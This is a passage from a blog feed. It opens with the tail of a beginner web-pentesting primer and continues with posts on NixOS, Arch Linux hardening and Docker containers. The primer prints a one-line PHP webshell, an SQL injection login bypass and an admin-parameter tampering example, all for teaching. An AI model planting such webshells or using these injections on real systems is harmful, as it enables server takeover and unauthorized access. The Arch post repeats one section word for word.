GET https://website.com/api/control-panel [RETURN CODE 200]

...
</code></pre>
<p>Common examples of Fuzzers include Ffuf, Burp intruder and GoBuster (which is specialised for directory enumeration)</p>
<h3 id="heading-proxies">Proxies</h3>
<p>Proxies are tools that sit in the middle of the website and the user's browser. They capture the HTTP history of communication between the user and the website.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711706001557/33b1b202-5f83-4045-91bc-0a1170333cce.png" alt class="image--center mx-auto" /></p>
<p>A common example of the proxy tool is Burp-Suite, the gold standard for WAPT.</p>
<h3 id="heading-vulnerability-scanners">Vulnerability scanners</h3>
<p>These tools assess the website for possible vulnerabilities and can generate things like phishing websites or SQL syntax to exploit it. Common tools are Metasploit (gold standard), XSRFProbe (For CSRF-based exploits), SQLMap (For SQLi based exploits)</p>
<h2 id="heading-dealing-with-internal-apis">Dealing with internal APIs</h2>
<p>Internal APIs deal with requests and responses sent between the website and the web-server.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711708656523/5a9194a2-13d0-4dcc-82c9-bb0e099048d0.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-api-recon">API Recon</h2>
<p>The aim is to find as many endpoints as possible. This is an intermediate stage before exploitation. There various types of HTTP requests, here's a list of common ones:</p>
<ul>
<li><p>GET -&gt; Ask the webserver for a resource</p>
</li>
<li><p>POST -&gt; Add new data</p>
</li>
<li><p>PATCH/PUT -&gt; Change existing data</p>
</li>
<li><p>OPTIONS -&gt; Options for types of requests allowed</p>
</li>
</ul>
<p>Through sending requests, we can explore these from the responses:</p>
<ul>
<li><p>Parameters (Hidden ones too)</p>
</li>
<li><p>Type of content accepted</p>
</li>
<li><p>Type of request accepted</p>
</li>
</ul>
<h2 id="heading-types-of-vulnerabilities">Types of vulnerabilities</h2>
<h3 id="heading-file-upload-and-webshell-attacks">File upload and webshell attacks</h3>
<p>Sometimes the file upload part of the website can be used to upload malicious scripts onto the web server and executed.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711706542616/a8b8bd53-73dd-4c9a-9b3e-45b475ab20b0.png" alt class="image--center mx-auto" /></p>
<p>This can be exploited if there is no <code>Content-Type</code> header restriction on the API request, meaning the website does not check if the uploaded file is an image (as intended) or a PHP script.</p>
<p>When we are dealing with things like this, the most common types of attacks are webshell attacks. In which shell commands can be executed in the web server using languages like PHP.</p>
<p>Here's an example command:</p>
<pre><code class="lang-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">echo</span> passthru($_GET[<span class="hljs-string">'cmd'</span>]); <span class="hljs-meta">?&gt;</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711706601232/d48a6591-4461-4680-9440-d37919e3f7c1.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-continued-flawed-file-type-validation">Continued: Flawed file type validation</h3>
<p>To counter this, website creators do add the content-type header. But what the request can be edited before it is send? We can capture the outgoing request through burp, and change the content-type restriction from the outgoing script to setting it as an "image"</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711706826048/4e494cd1-28ac-406e-9e8b-65fe141d365b.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-server-side-request-forgery">Server Side Request Forgery</h2>
<p>Server Side Request Forgery (SSRF) is a technique where requests sent by the website to the web-server are edited to gain access to sensitive info (usually).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711707235111/2405042f-dc8e-4b95-b6dd-16efec24754c.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-2fa-bypass">2FA bypass</h2>
<p>This is usually a rare case but sometimes the user is already logged in during login before they enter their MFA code.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711707440601/61a2bb15-3778-4d79-9d5d-0d8d0dcffe06.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-privilege-escalation">Privilege escalation</h2>
<p>In this technique we check if we can access other user's profiles through ours. We make our way into the admin dashboard through this technique. We can achieve this by editing the search query in the URL or editing the parameters in the requests.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711708032214/a9d6e23a-34ba-4223-a5a8-7e542975cd2f.png" alt class="image--center mx-auto" /></p>
<p>We can also explore through the source code (usually JS) too look for clues for api endpoints to the admin panel</p>
<p>like this:</p>
<pre><code class="lang-plaintext">https://website.com/login/home?admin=false
#now set this to true
https://website.com/login/home?admin=true
</code></pre>
<p>Sometimes we may also find these parameters (like <code>admin</code>) in the HTTP history when exploring through the responses.</p>
<h2 id="heading-sql-injection">SQL injection</h2>
<p>Structured Query Language is a language used to query and manipulate databases with ease. However when integrated into web-servers, we can forge SQL commands that can be put into search boxes to send an SQL command through the internal API to the web-server and return the query result instead of a normal one.</p>
<p>Here's an example, if we have a login page requiring username and password and the user account existence is checked by this command in the web-server:</p>
<pre><code class="lang-plaintext">SELECT * FROM USERS WHERE username="superman" AND password="m4sterh4xx0r";
</code></pre>
<p>Then if it exists, the website logs the user in. We can exploit it.</p>
<p>We can input an SQL statement in the strings and edit the query sent through the internal API</p>
<pre><code class="lang-plaintext">SELECT * FROM USERS WHERE username="superman"--" AND password="m4sterh4xx0r";
</code></pre>
<p>here, we have input "-- into the username string where " closes the string and -- comments out the rest of the query, so the password check is simply ignored and lets us in.</p>
<p>However, for an SQLi to be successful, we need to be vary of the technology of SQL the web-server is using, its version and the columns which accept string input (also the table name sometimes). Usually websites tend to use MySQL, MariaDB, PostgreSQL or Oracle Database</p>
<h2 id="heading-cross-site-request-forgery">Cross-site request forgery</h2>
<p>This technique is usually related to using the user's existing session to change their credentials and login.</p>
<p>The most common application of CSRF is related (but not entirely encompassing) to phishing.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711709575953/4a9ffdfb-c6c5-4bea-a600-5d0bd96cab26.png" alt class="image--center mx-auto" /></p>
<p>A user's login session (also the time span the website thinks that the user is logged in) is determined by a session cookie. It is a token. However if a hacker manages to get hold of it, they can send requests with the user's session cookie to change their credentials and login as the user (because the website thinks the hacker is the user, by looking at the session cookie!).</p>
<p>There are thankfully, safeguards to this:</p>
<ul>
<li><p>Additional <code>csrf token</code> parameter whose value is randomly generated every session</p>
</li>
<li><p>Measures to make sure that the generated CSRF token is tied to only that particular user's session</p>
</li>
</ul>
<p>If either of these is absent, it becomes easy for the hacker to attempt a CSRF attack.</p>
<h1 id="heading-references">References:</h1>
<ul>
<li><p><a target="_blank" href="https://github.com/JohnTroony/php-webshells">https://github.com/JohnTroony/php-webshells</a></p>
</li>
<li><p><a target="_blank" href="https://portswigger.net/web-security">https://portswigger.net/web-security</a></p>
</li>
<li><p><a target="_blank" href="https://portswigger.net/burp">https://portswigger.net/burp</a></p>
</li>
<li><p><a target="_blank" href="https://github.com/ffuf/ffuf">https://github.com/ffuf/ffuf</a></p>
</li>
<li><p><a target="_blank" href="https://www.metasploit.com/">https://www.metasploit.com/</a></p>
</li>
<li><p><a target="_blank" href="https://github.com/0xInfection/XSRFProbe">https://github.com/0xInfection/XSRFProbe</a></p>
</li>
<li><p><a target="_blank" href="https://excalidraw.com/">https://excalidraw.com/</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[❄️ NixOS: OS as Code]]></title><description><![CDATA[There are many Linux-based distributions out there, some are flashy, some are minimal, some are bloated (i guess we all hate those ones, lol). Then we have NixOS, a very fundamentally different Linux distro from all its other relatives. It can be sum...]]></description><link>https://blog.berzi.one/nixos</link><guid isPermaLink="true">https://blog.berzi.one/nixos</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sun, 24 Mar 2024 14:52:37 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1711290328715/4c1649c8-9201-4b40-9b43-ce64cddc2dde.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>There are many Linux-based distributions out there, some are flashy, some are minimal, some are bloated (i guess we all hate those ones, lol). Then we have NixOS, a very fundamentally different Linux distro from all its other relatives. It can be summarized in three words: declarative, reproducible, and immutable.</p>
<h2 id="heading-declarative">Declarative</h2>
<p>Let's start with the first attribute, NixOS's declarative configuration makes it easy to write configurations for the various components in our operating system in an easy-to-understand language called "Nix". Nix is very similar to JSON syntax wise.<br />For declaring NixOS config, we write a file called <code>configuration.nix</code> which is stored in <code>/etc/nixos/</code></p>
<pre><code class="lang-nix">{
  <span class="hljs-attr">imports</span> =
    [ <span class="hljs-comment"># Include the results of the hardware scan.</span>
      ./hardware-configuration.nix

    ];

  <span class="hljs-comment"># Bootloader.</span>
  boot.loader.systemd-boot.<span class="hljs-attr">enable</span> = <span class="hljs-literal">true</span>;
  boot.loader.efi.<span class="hljs-attr">canTouchEfiVariables</span> = <span class="hljs-literal">true</span>;

  networking.<span class="hljs-attr">hostName</span> = <span class="hljs-string">"endernix"</span>; <span class="hljs-comment"># Define your hostname...</span>
  <span class="hljs-comment"># Enable networking</span>
  networking.networkmanager.<span class="hljs-attr">enable</span> = <span class="hljs-literal">true</span>;

  <span class="hljs-comment"># Enable docker</span>
  virtualisation.docker.<span class="hljs-attr">enable</span> = <span class="hljs-literal">true</span>;

  <span class="hljs-comment"># Enable bluetooth</span>
  hardware.bluetooth.<span class="hljs-attr">enable</span> = <span class="hljs-literal">true</span>;
  hardware.bluetooth.<span class="hljs-attr">powerOnBoot</span> = <span class="hljs-literal">true</span>;
...
}
</code></pre>
<p>The comments above each line or chunk of code describe their functionality. For example, the Bluetooth chunk describes that when re-building the system again, it needs to enable and start the bluetooth service on boot. We'll get into rebuilds later on, but how do we install packages? Easy. we declare it in the same file.  </p>
<pre><code class="lang-nix">{ ...
users.users.<span class="hljs-attr">ifkash</span> = {
    <span class="hljs-attr">isNormalUser</span> = <span class="hljs-literal">true</span>;
    <span class="hljs-attr">description</span> = <span class="hljs-string">"Kashif"</span>;
    <span class="hljs-attr">extraGroups</span> = [ <span class="hljs-string">"networkmanager"</span> <span class="hljs-string">"wheel"</span> <span class="hljs-string">"docker"</span> ];
    <span class="hljs-attr">packages</span> = <span class="hljs-keyword">with</span> pkgs; [
      <span class="hljs-comment"># Browsers</span>
      brave
      firefox
      google-chrome
      <span class="hljs-comment"># Fetch tools</span>
      neofetch
      sysfetch
      nitch
    ];
};

...
}
</code></pre>
<p>Now these blocks can be placed anywhere in the file, because Nix is a purely functional programming language, which in layman's terms mean that positions of definitions does not matter sequentially.</p>
<h2 id="heading-reproducibility">Reproducibility</h2>
<p>Once our system's file has been configured, it's time to build/modify our system. Running <code>sudo nixos-rebuild switch</code> will read the entire configuration file and build a new Nix system accordingly. Now comes the question, would it take nearly double the size of the previous version if i simply include small packages in the new rebuild? The answer is No.</p>
<h3 id="heading-nixstore">/nix/store</h3>
<p>Nix store is a location where Nix system stores all the names of the packages in the form of files with their dependency list hashed and attached to the file name. This way, whenever the system is rebuilt, if it is available in nix store, it is simply ignored. If not, a new file is created in nix store and added with appropriate rules.</p>
<p>We can also go back to our previous build with `<code>nixos-rebuild --rollback switch</code></p>
<h3 id="heading-rollbacks-never-break-your-system-again">Rollbacks - Never break your system again</h3>
<p>Hence, incase our new system breaks for some reason, we can always switch back to the previous version and get our work done. This feature gives it the deadly advantage against distros like Arch Linux.</p>
<h2 id="heading-immutability">Immutability</h2>
<p>Since the system is defined declaratively, it's not possible to modify the system's existing state (like updating/upgrading packages, etc) This is not a bug, but a feature. It enables further safety against breaking our systems. This also means we cannot install additional things into the system in the current rebuild. It also makes the system more secure against attacks that intend to change ownership permissions or corrupt the boot files of the system.</p>
<h2 id="heading-the-nix-package-manager">The Nix package manager</h2>
<p>The Nix package manager fetches from the Nix package repository, one of the largest repos among all operating systems, it even beats Arch's user repository well known for its enormous package support. Hence, Nix boasts better software support than most operating systems on the planet.</p>
<p>You can search your favorite packages here: <a target="_blank" href="https://search.nixos.org/packages">https://search.nixos.org/packages</a></p>
<h2 id="heading-why-use-nixos-as-a-daily-driver">Why use NixOS as a daily driver?</h2>
<p>Apart from excellent software support, and all its other features. NixOS doesn't feel different from other Linux distros at all on the surface level. There's that feel-at-home and works-out-of-the-box feeling. Now that NixOS's installation ISO comes with the graphical calamares installer, it makes installing it even easier.</p>
<h2 id="heading-acknowledgements">Acknowledgements</h2>
<ul>
<li><p><a target="_blank" href="https://nixos.org/">https://nixos.org/</a></p>
</li>
<li><p><a target="_blank" href="https://github.com/kashifulhaque/nixos-config">https://github.com/kashifulhaque/nixos-config</a></p>
</li>
<li><p><a target="_blank" href="https://ianthehenry.com/posts/how-to-learn-nix/">https://ianthehenry.com/posts/how-to-learn-nix/</a></p>
</li>
<li><p><a target="_blank" href="https://www.youtube.com/@vimjoyer">https://www.youtube.com/@vimjoyer</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[🩸Arch Linux: Cutting edge SecOps]]></title><description><![CDATA[The series focuses heavily on Linux, especially Arch, because it is one of the most minimal and hence most universally adaptable distribution of Linux. Arch based distributions also come with some superpowers that other distros like debian don't prov...]]></description><link>https://blog.berzi.one/uniqueness-of-arch-linux</link><guid isPermaLink="true">https://blog.berzi.one/uniqueness-of-arch-linux</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sun, 21 Jan 2024 09:11:42 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1705827084794/1b99b1ad-0077-4eb8-a465-c4ca9c240166.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The series focuses heavily on Linux, especially Arch, because it is one of the most minimal and hence most universally adaptable distribution of Linux. Arch based distributions also come with some superpowers that other distros like debian don't provide. Let's take a deep dive into those exquisite abilities on this day.</p>
<h3 id="heading-arch-wiki">Arch Wiki</h3>
<p>The ultimate manual for anything arch-related. The arch wiki and arch forums have everything you need regarding any issue you're facing or any mods you want to do to arch. Let's say you want to install gnome on your Arch that runs KDE-Plasma but don't exactly know how to do it. Just put in your issue with the suffix "arch wiki" in google.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705827310455/1096c746-40cc-4a1f-872a-b1222ce8d76a.png" alt class="image--center mx-auto" /></p>
<p>The instructions rarely get outdated as the wiki is regularly updated with the latest information by the community (which is public and open). Some times the solutions proposed in arch wiki pages even work on non-arch based distributions if it is not a distro-specific problem.</p>
<h3 id="heading-arch-user-repository-aur">Arch User Repository (AUR)</h3>
<p>Apart from The community maintained registry for arch linux packages. It is ginormous in terms of variety of packages. You can install almost any package from the AUR, be it Spotify, Discord or even Google-Chrome!</p>
<h4 id="heading-aur-helpers">AUR helpers</h4>
<p>Installing a package from the AUR, requires you to clone the repo and give the build command <code>makepkg -si</code> so that the system reads the MAKEPKG file.</p>
<p>MAKEPKG acts as a blueprint for building the package and adding it to system PATH.</p>
<p>However, AUR helpers assist in automating the build process. There are several apps like <code>yay</code> and <code>paru</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705828073036/37633216-0338-45cc-bfa7-b271b32be751.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-minimalism">Minimalism</h3>
<p>Arch Linux provides us with the power to start from a minimal installation, which means that we decide what goes into our system, including even the kernel!</p>
<p>This helps avoid bloatware and enable for a lightning-fast system. Especially for developers when they combine their workflow with the clax.nvim neovim configuration.</p>
<h3 id="heading-self-development">Self-development</h3>
<p>Not only do we learn about partitioning, and different kinds of file systems, keymapping, audio servers and daemons, but also does installing arch help build a basic overview knowledge of foundations of an operating system.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705828104991/d94fcd76-5f5b-4add-b28c-11bcdd642492.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-bleeding-edge-updates">Bleeding-edge updates</h3>
<p>This is also a double-edged sword, bleeding-edge updates means that all of the system's packages are updated to the very latest version. If neovim's version on Debian is 0.6.1, it is 0.9.1 on Arch linux. But it also means that despite supporting newer technologies like lua configs in neovim, software and hence system may risk breaking due to the packages being too new and not being compatible with things like hardware.</p>
<p>Maintenance is also needed in Arch Linux, so we need to regularly make sure the system is updated. This is not an issue because it helps us stay more conscious of our system's workings.</p>
<h2 id="heading-security-implementations">Security Implementations</h2>
<p>In an era where digital threats are constantly evolving, prioritizing the security of your system is paramount. This blog will delve into various aspects of enhancing security, covering essential topics such as drive encryption, file systems, firewalls, and secure boot. By incorporating robust security measures, you can significantly reduce the risk of unauthorized access, data breaches, and other potential threats.</p>
<h4 id="heading-drive-encryption-withcryptsetup"><strong>Drive Encryption with</strong><code>cryptsetup</code><strong>:</strong></h4>
<p>Drive encryption is a fundamental step towards securing your data. The use of <code>cryptsetup</code>, a utility for setting up encrypted filesystems, ensures that even if someone gains physical access to your storage device, they won't be able to access sensitive information without the encryption key.</p>
<p>To implement drive encryption with <code>cryptsetup</code>, follow these steps:</p>
<ul>
<li><p>Install <code>cryptsetup</code> on your system.</p>
</li>
<li><p>Use the <code>cryptsetup</code> command to create an encrypted container or encrypt an existing partition.</p>
</li>
<li><p>Set up a strong passphrase or keyfile for added security.</p>
</li>
</ul>
<p><strong>Understanding</strong><code>btrfs</code><strong>File System:</strong></p>
<p>The choice of a file system plays a crucial role in system security. The Btrfs (B-Tree File System) is a modern and feature-rich file system that offers advantages over traditional ones like ext4. <code>btrfs</code> provides improved data integrity, efficient snapshots, and support for advanced storage technologies.</p>
<p>Compare <code>btrfs</code> with <code>ext4</code>:</p>
<ul>
<li><p><code>btrfs</code> supports advanced features like snapshots, copy-on-write, and checksums.</p>
</li>
<li><p><code>ext4</code> is a mature and stable file system with a long history of reliability.</p>
</li>
<li><p>Consider your specific use case and requirements before choosing between <code>btrfs</code> and <code>ext4</code>.</p>
</li>
</ul>
<h4 id="heading-configuring-ufw-firewall"><strong>Configuring ufw Firewall:</strong></h4>
<p>A firewall is a critical component in safeguarding your system from network threats. Uncomplicated Firewall (ufw) is a user-friendly interface for managing iptables, the default Linux firewall. By enabling ufw, you can control incoming and outgoing traffic, thereby fortifying your system against potential attacks.</p>
<p>To set up <code>ufw</code>:</p>
<ul>
<li><p>Install <code>ufw</code> on your system.</p>
</li>
<li><p>Define rules for allowing or blocking specific traffic.</p>
</li>
<li><p>Enable <code>ufw</code> to start on system boot for continuous protection.</p>
</li>
</ul>
<h4 id="heading-secure-boot-withsbctl"><strong>Secure Boot with</strong><code>sbctl</code><strong>:</strong></h4>
<p>Secure Boot is a security feature that ensures the integrity of the boot process, preventing the loading of unauthorized or tampered code during system startup. <code>sbctl</code> is a tool for managing Secure Boot settings on Linux systems.</p>
<p>To enable Secure Boot with <code>sbctl</code>:</p>
<ul>
<li><p>Check if your system supports Secure Boot.</p>
</li>
<li><p>Put Secure boot in setup mode by deleting all secure boot variables.</p>
</li>
<li><p>Generate and enroll Secure Boot keys.</p>
</li>
<li><p>Use <code>sbctl</code> to configure and enable Secure Boot.</p>
</li>
</ul>
<p>In today's digital landscape, prioritizing security is non-negotiable. By implementing robust measures such as drive encryption, choosing advanced file systems like Btrfs, configuring firewalls, and enabling Secure Boot, you significantly enhance the protection of your system. RIn an era where digital threats are constantly evolving, prioritizing the security of your system is paramount. This blog will delve into various aspects of enhancing security, covering essential topics such as drive encryption, file systems, firewalls, and secure boot. By incorporating robust security measures, you can significantly reduce the risk of unauthorized access, data breaches, and other potential threats.</p>
<h4 id="heading-drive-encryption-withcryptsetup-1"><strong>Drive Encryption with</strong><code>cryptsetup</code><strong>:</strong></h4>
<p>Drive encryption is a fundamental step towards securing your data. The use of <code>cryptsetup</code>, a utility for setting up encrypted filesystems, ensures that even if someone gains physical access to your storage device, they won't be able to access sensitive information without the encryption key.</p>
<p>To implement drive encryption with <code>cryptsetup</code>, follow these steps:</p>
<ul>
<li><p>Install <code>cryptsetup</code> on your system.</p>
</li>
<li><p>Use the <code>cryptsetup</code> command to create an encrypted container or encrypt an existing partition.</p>
</li>
<li><p>Set up a strong passphrase or keyfile for added security.</p>
</li>
</ul>
<p><strong>Understanding</strong><code>btrfs</code><strong>File System:</strong></p>
<p>The choice of a file system plays a crucial role in system security. The Btrfs (B-Tree File System) is a modern and feature-rich file system that offers advantages over traditional ones like ext4. <code>btrfs</code> provides improved data integrity, efficient snapshots, and support for advanced storage technologies.</p>
<p>Compare <code>btrfs</code> with <code>ext4</code>:</p>
<ul>
<li><p><code>btrfs</code> supports advanced features like snapshots, copy-on-write, and checksums.</p>
</li>
<li><p><code>ext4</code> is a mature and stable file system with a long history of reliability.</p>
</li>
<li><p>Consider your specific use case and requirements before choosing between <code>btrfs</code> and <code>ext4</code>.</p>
</li>
</ul>
<h4 id="heading-configuring-ufw-firewall-1"><strong>Configuring ufw Firewall:</strong></h4>
<p>A firewall is a critical component in safeguarding your system from network threats. Uncomplicated Firewall (ufw) is a user-friendly interface for managing iptables, the default Linux firewall. By enabling ufw, you can control incoming and outgoing traffic, thereby fortifying your system against potential attacks.</p>
<p>To set up <code>ufw</code>:</p>
<ul>
<li><p>Install <code>ufw</code> on your system.</p>
</li>
<li><p>Define rules for allowing or blocking specific traffic.</p>
</li>
<li><p>Enable <code>ufw</code> to start on system boot for continuous protection.</p>
</li>
</ul>
<h4 id="heading-secure-boot-withsbctl-1"><strong>Secure Boot with</strong><code>sbctl</code><strong>:</strong></h4>
<p>Secure Boot is a security feature that ensures the integrity of the boot process, preventing the loading of unauthorized or tampered code during system startup. <code>sbctl</code> is a tool for managing Secure Boot settings on Linux systems.</p>
<p>To enable Secure Boot with <code>sbctl</code>:</p>
<ul>
<li><p>Check if your system supports Secure Boot.</p>
</li>
<li><p>Put Secure boot in setup mode by deleting all secure boot variables.</p>
</li>
<li><p>Generate and enroll Secure Boot keys.</p>
</li>
<li><p>Use <code>sbctl</code> to configure and enable Secure Boot.</p>
</li>
</ul>
<p>In today's digital landscape, prioritizing security is non-negotiable. By implementing robust measures such as drive encryption, choosing advanced file systems like Btrfs, configuring firewalls, and enabling Secure Boot, you significantly enhance the protection of your system. Regularly updating and auditing these security measures will ensure that your defenses remain strong against evolving threats.</p>
<h3 id="heading-documentations">Documentations</h3>
<ul>
<li><p><a target="_blank" href="https://docs.kernel.org/filesystems/btrfs.html">https://docs.kernel.org/filesystems/btrfs.html</a></p>
</li>
<li><p><a target="_blank" href="https://wiki.archlinux.org/title/dm-crypt/Device_encryption">https://wiki.archlinux.org/title/dm-crypt/Device_encryption</a></p>
</li>
<li><p><a target="_blank" href="https://wiki.archlinux.org/title/Unified_Extensible_Firmware_Interface/Secure_Boot">https://wiki.archlinux.org/title/Unified_Extensible_Firmware_Interface/Secure_Boot</a></p>
</li>
<li><p><a target="_blank" href="https://docs.kernel.org/filesystems/btrfs.html">https://docs.kernel.org/filesystems/btrfs.html</a></p>
</li>
<li><p><a target="_blank" href="https://wiki.archlinux.org/title/dm-crypt/Device_encryption">https://wiki.archlinux.org/title/dm-crypt/Device_encryption</a></p>
</li>
<li><p><a target="_blank" href="https://wiki.archlinux.org/title/Unified_Extensible_Firmware_Interface/Secure_Boot">https://wiki.archlinux.org/title/Unified_Extensible_Firmware_Interface/Secure_Boot</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[🤖 Virtualising machines]]></title><description><![CDATA[One of the most essential and important concerning isolated environments and modern cloud architecture in data centers. Virtual Machines and Containers provide a replication development/deployment environment for software. Despite both existing as an...]]></description><link>https://blog.berzi.one/virtualising-machines</link><guid isPermaLink="true">https://blog.berzi.one/virtualising-machines</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sun, 14 Jan 2024 14:08:44 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1705239516544/17a17696-a558-4adf-bc1d-0d4e79a2ec71.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>One of the most essential and important concerning isolated environments and modern cloud architecture in data centers. Virtual Machines and Containers provide a replication development/deployment environment for software. Despite both existing as an abstraction layer above the host system, they differ conceptually when concerning factors like their architecture, speed and resource footprint.</p>
<h3 id="heading-virtual-machines">Virtual Machines</h3>
<p>Virtual Machines are specialized environments that emulate a computer operating system. They can be further specialized to deploy particular software. Let's think of running an OS like Linux, but over the host system running Windows. Here, Linux will be treated as a "Guest OS" and will be running atop Windows as an Application.</p>
<p>Virtual machines are governed by a type of software called a "Hypervisor", these can control their deployment.</p>
<p><img src="https://www.data-storage.uk/wp-content/uploads/2022/03/hypervisor.jpg" alt="Understanding a hypervisor the simple way - Data Storage Solutions" /></p>
<p>Hypervisors also enable us to distribute hardware resources among virtual machines according to preference. If we have a 128GB RAM server and a lot of clients that want to access it, we would split the hardware resource among several virtual machines, so that each client gets their own isolated space and OS to run with a particular quantity of machine resources (like CPU and memory) allotted to them.</p>
<h3 id="heading-what-can-be-improved">What can be improved</h3>
<p><img src="https://www.baeldung.com/wp-content/uploads/sites/4/2021/05/os-kernel-2.png" alt="What Is an OS Kernel? | Baeldung on Computer Science" /></p>
<p>An Operating system in general consists of two stacked layers over the hardware.</p>
<p>Going from top to bottom, we first encounter the OS Applications layer, which consists of all the software run on the machine.</p>
<p>Secondly, we get the OS kernel, the layer that deals with communication with hardware resources, and acts as a bridge between the hardware and the OS Applications layer.</p>
<p>A virtual machine emulates both the OS kernel and the applications layer stacked in the mentioned order. This results in excessive use of resources, however there is a solution to this. We can use the host's kernel instead of having multiple kernels run altogether.</p>
<h3 id="heading-enter-containers">Enter: Containers</h3>
<p>With the added advantage of using the host's kernel, Containers save on resources and boost up speed. Docker is used specifically because it's one of the most popular tools and also the one that revolutionized this category, also its registry, Docker-Hub is one of the largest repositories for pulling dependencies for your project.</p>
<p><img src="https://images.contentstack.io/v3/assets/blt300387d93dabf50e/bltb6200bc085503718/5e1f209a63d1b6503160c6d5/containers-vs-virtual-machines.jpg" alt="Docker vs Virtual Machines (VMs) : A Practical Guide to Docker Containers  and VMs" /></p>
<p>We have a container engine that manages these containers or isolated environments, Just like a hypervisor.</p>
<h2 id="heading-spinning-up-a-new-container">Spinning up a new container</h2>
<p>Docker can be installed through the official set of instructions on their <a target="_blank" href="https://docs.docker.com/engine/install/">site</a>.</p>
<p>It uses the Docker engine which the docker daemon responsible for all processes concerning it.</p>
<p>There are two options, one is to either pull an existing container through Docker's registry called <a target="_blank" href="https://hub.docker.com/">Docker Hub</a>. Secondly is to build custom images to suit our project's needs.</p>
<h3 id="heading-using-existing-images">Using existing images</h3>
<p>To clone a docker container off Docker Hub,</p>
<pre><code class="lang-dockerfile">docker pull &lt;image_name&gt;:&lt;version&gt;
</code></pre>
<p>We can then start this container by getting the image ID through the <code>docker images</code> command.</p>
<pre><code class="lang-dockerfile">docker start &lt;image_ID&gt;
</code></pre>
<h3 id="heading-building-a-custom-image">Building a custom image</h3>
<p>In order to build a custom image, a blueprint file called a <code>Dockerfile</code> needs to be added to the project directory. This will contain all the configuration code, regarding what dependency versions and base image (which is the OS image that will be emulated) will be included in the container.</p>
<p>A typical <code>Dockerfile</code> would look somewhat similar to the one below.</p>
<pre><code class="lang-dockerfile"><span class="hljs-keyword">FROM</span> &lt;primary_service&gt;:&lt;base_image&gt;
<span class="hljs-keyword">COPY</span><span class="bash"> &lt;<span class="hljs-built_in">source</span> code directory&gt; /app/</span>
<span class="hljs-keyword">WORKDIR</span><span class="bash"> &lt;the working directory&gt;</span>
<span class="hljs-keyword">RUN</span><span class="bash"> &lt;any terminal commands&gt;</span>
</code></pre>
<p>Now that the blueprint is made, time to build and deploy a docker container with the following configuration.</p>
<pre><code class="lang-dockerfile">docker build &lt;location_to_save_container&gt;
</code></pre>
<p>This builds the docker container following the blueprint, now this can be uploaded to Docker Hub or any repository to ship it to other environments and servers.</p>
<h3 id="heading-week-2-extra-docker-vs-podman">Week 2 Extra: Docker Vs. Podman</h3>
<p>Podman is a popular alternative to Docker and possibly is aiming to succeed it. It has now been adopted to be used in container orchestration tools like Kubernetes.</p>
<h4 id="heading-the-advantage">The Advantage</h4>
<ul>
<li><p>Podman optionally requires root/admin privileges to build/run containers. Which makes it safer for the deployment system.</p>
</li>
<li><p>Unlike Docker which uses a daemon (background service) that constantly listens for new requests using the client-server architecture. Podman's philosophy has a daemon-less architecture and hence saves up on system resources.</p>
</li>
<li><p>Mostly all docker commands work with Podman with the replacement of the word "docker" with "podman" (at least as far as the CLI is concerned).</p>
</li>
<li><p>Podman isn't a monolithic piece of software unlike Docker. It depends on software like systemd. Hence it is more lightweight.</p>
</li>
</ul>
<p>In summary, Podman is overall a safer alternative than Docker.</p>
<h3 id="heading-some-extra-reads">Some Extra Reads:</h3>
<ul>
<li><p><a target="_blank" href="https://www.imaginarycloud.com/blog/podman-vs-docker/">https://www.imaginarycloud.com/blog/podman-vs-docker/</a></p>
</li>
<li><p><a target="_blank" href="https://berzi.hashnode.dev/containers-and-virtualization-with-docker">https://berzi.hashnode.dev/containers-and-virtualization-with-docke</a>r</p>
</li>
<li><p><a target="_blank" href="https://docs.podman.io/en/latest/">https://docs.podman.io/en/latest/</a></p>
</li>
<li><p><a target="_blank" href="https://www.vmware.com/in/topics/glossary/content/virtual-machine.html">https://www.vmware.com/in/topics/glossary/content/virtual-machine.html</a></p>
</li>
</ul>
